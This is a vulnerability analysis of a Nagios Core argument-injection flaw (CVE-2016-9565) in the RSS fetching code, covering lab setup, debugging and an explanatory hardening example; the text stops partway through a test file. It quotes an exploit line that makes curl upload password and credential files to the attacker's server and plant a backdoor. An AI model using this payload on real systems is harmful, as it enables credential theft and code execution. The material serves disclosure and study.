Nagios Core code execution vulnerability (CVE-2016-9565) analysis

ID MYHACK58:62201682159
Type myhack58
Reporter Anonymous
Modified 2016-12-17T00:00:00


Author: p0wd3r, dawu (Knownsec 404 Security Lab)

Date: 2016-12-15

0x00 vulnerability overview

1. Vulnerability description

Nagios is a program for monitoring IT infrastructure. Security researcher Dawid Golunski recently found a code execution vulnerability in Nagios Core: the attacker first impersonates the RSS feed source; when the victim application fetches the RSS information, the attacker returns maliciously constructed data, which the program injects into a curl command while processing it, leading to code execution.

2. Vulnerability

Preconditions for triggering the vulnerability:

  1. The attacker can impersonate https://www.nagios.org, using DNS spoofing or similar methods
  2. The attacker is authorized, or the attacker lures an authorized user into visiting one of the files rss-corefeed.php, rss-newsfeed.php and rss-corebanner.php.

A successful attack executes arbitrary code.

3. Affected versions

Nagios Core < 4.2.2

0x01 vulnerability reproduction

1. Environment setup

Dockerfile:

FROM quantumobject/docker-nagios

RUN sed -i '99d' /usr/local/nagios/share/includes/rss/rss_fetch.inc

RUN mkdir /tmp/tmp && chown www-data:www-data /tmp/tmp

Then run:

docker run -p 80:80 --name nagios -d quantumobject/docker-nagios

Visit the site and log in with nagiosadmin:admin.

2. Vulnerability analysis

The vulnerability is triggered at line 657 of /usr/local/nagios/share/includes/rss/extlib/Snoopy.class.inc, in the _httpsrequest function:

// version < 4.2.0
exec($this->curl_path." -D \"/tmp/$headerfile\"".escapeshellcmd($cmdline_params)." ".escapeshellcmd($URI),$results,$return);

// version >= 4.2.0 && version < 4.2.2
exec($this->curl_path." -D \"/tmp/$headerfile\"".$cmdline_params." \"".escapeshellcmd($URI)."\"",$results,$return);

Here escapeshellcmd is used to process the command parameters. What escapeshellcmd does is shown below:

[Image: description of the escapeshellcmd function]

The author's intent was to prevent execution of multiple commands, but this handling does not prevent the injection of multiple arguments. If $URI is controllable, some of curl's features can then be used to read and write files, leading to code execution. (In general, escapeshellarg should be used to prevent injection of multiple arguments, but that function is not absolutely safe either; see CVE-2015-4642.)

Because CVE-2008-4796 had been disclosed earlier, the code was changed in version 4.2.0, but the patch can be bypassed as long as the input closes the surrounding double quotes (").
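The difference between the two quoted code patterns and an argument-safe form can be seen by printing the argument vector the shell actually produces. This is an added example, not code from Nagios, Snoopy or the original article; the function names, the feed.example host and the hardened variant are assumptions made for illustration, and it assumes a Linux host where exec() runs /bin/sh.

```php
<?php
// Added illustration, not Nagios/Snoopy code. printf stands in for curl, so the
// script only prints the argument vector the shell would pass to the binary.
const ARGV_PRINTER = "printf '[%s]\\n'";

// Pattern the article quotes for versions < 4.2.0: escapeshellcmd(), no quoting.
function build_pre_420(string $uri): string {
    return ARGV_PRINTER . " " . escapeshellcmd($uri);
}

// Pattern quoted for 4.2.0 <= version < 4.2.2: URI wrapped in double quotes.
function build_420(string $uri): string {
    return ARGV_PRINTER . " \"" . escapeshellcmd($uri) . "\"";
}

// Hardened variant (assumption, not the upstream patch): allow-list the scheme,
// reject whitespace/quotes/backslashes, quote with escapeshellarg(), and emit
// the conventional "--" end-of-options marker before the URL.
function build_hardened(string $uri): string {
    $scheme = parse_url($uri, PHP_URL_SCHEME);
    if (!in_array($scheme, ['http', 'https'], true)
        || preg_match('/[\s"\'\\\\]/', $uri)) {
        throw new InvalidArgumentException('rejected URI');
    }
    return ARGV_PRINTER . " -- " . escapeshellarg($uri);
}

// Run the command and return one "[arg]" line per argument the shell produced.
function argv_seen(string $cmd): array {
    exec($cmd, $out);
    return $out;
}

// Constructed inputs; --version is a harmless flag used only to show splitting.
$cases = [
    ['build_pre_420',  'http://feed.example/rss --version'],
    ['build_420',      'http://feed.example/rss --version'],
    ['build_420',      'http://feed.example/rss" --version "'],
    ['build_hardened', 'http://feed.example/rss'],
    ['build_hardened', 'http://feed.example/rss" --version "'],
];
foreach ($cases as [$builder, $uri]) {
    try {
        $argv = implode(' ', argv_seen($builder($uri)));
    } catch (InvalidArgumentException $e) {
        $argv = $e->getMessage();
    }
    printf("%-14s %-38s => %s\n", $builder, $uri, $argv);
}
```

Each bracketed item in the output is one argument; a row showing more than one bracket for a single URI is a case where extra arguments reached the command line.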

Next we check whether $URI is controllable. Following the code logic, _httpsrequest is called from the fetch_rss function in /usr/local/nagios/share/includes/rss/rss_fetch.inc, so we create a test file test.php:

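<?php
// Point MagpieRSS at the bundled library and disable caching
define('MAGPIE_DIR', './includes/rss/');
define('MAGPIE_CACHE_ON', 0);
define('MAGPIE_CACHE_AGE', 0);
define('MAGPIE_CACHE_DIR', '/tmp/magpie_cache');
require_once(MAGPIE_DIR.'rss_fetch.inc');

// Pass a curl option instead of a URL to see whether it reaches exec() unfiltered
fetch_rss(' --version');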

After enabling dynamic debugging and visiting test.php, we set a breakpoint at the exec call. The call stack is as follows:

[Image: call stack at the exec breakpoint]

$URI is as follows:

[Image: value of $URI at the breakpoint]

This shows that $URI is controllable and is not filtered on its way in.

Next we need to construct curl arguments that produce the result we want. Here we use the exploit provided by Dawid Golunski. Note that the code he provided targets versions before 4.2.0; to verify versions greater than or equal to 4.2.0 and less than 4.2.2, the code needs a small change: add the double quotes required to close the quoting:

Line 44:

self.redirect('https://' + self.request.host + '/nagioshack" -Fpasswd=@/etc/passwd -Fgroup=@/etc/group -Fhtauth=@/usr/local/nagios/etc/htpasswd.users --trace-ascii ' + backdoor_path + '"', permanent=False)

The exploit works as follows:

  1. The attacker starts an HTTP/HTTPS server on their own server
  2. The victim uses fetch_rss to send a request to that server
  3. The attacker receives the request and redirects it; the redirect URL is https:// + the attacker's server + payload. In the payload, -F sends file contents to the server and --trace-ascii records the traffic to a file, similar to the use of -X with the mail function in the Roundcube RCE.
  4. After receiving the redirected request, the server performs the following three operations:
     1. Parses the file contents
     2. Returns the backdoor content, which is then written to the backdoor file through the traffic record
     3. Returns the constructed XML, with <img src=backdoor.php> added to the description
  5. The victim parses the XML and outputs the contents of the description to HTML, which then automatically executes the backdoor

To make verification easier, we create exp.php in the website directory:

<?php
define('MAGPIE_DIR', './includes/rss/');
define('MAGPIE_CACHE_ON', 0);
define('MAGPIE_CACHE_AGE', 0);
define('MAGPIE_CACHE_DIR', '/tmp/magpie_cache');
require_once(MAGPIE_DIR.'rss_fetch.inc');

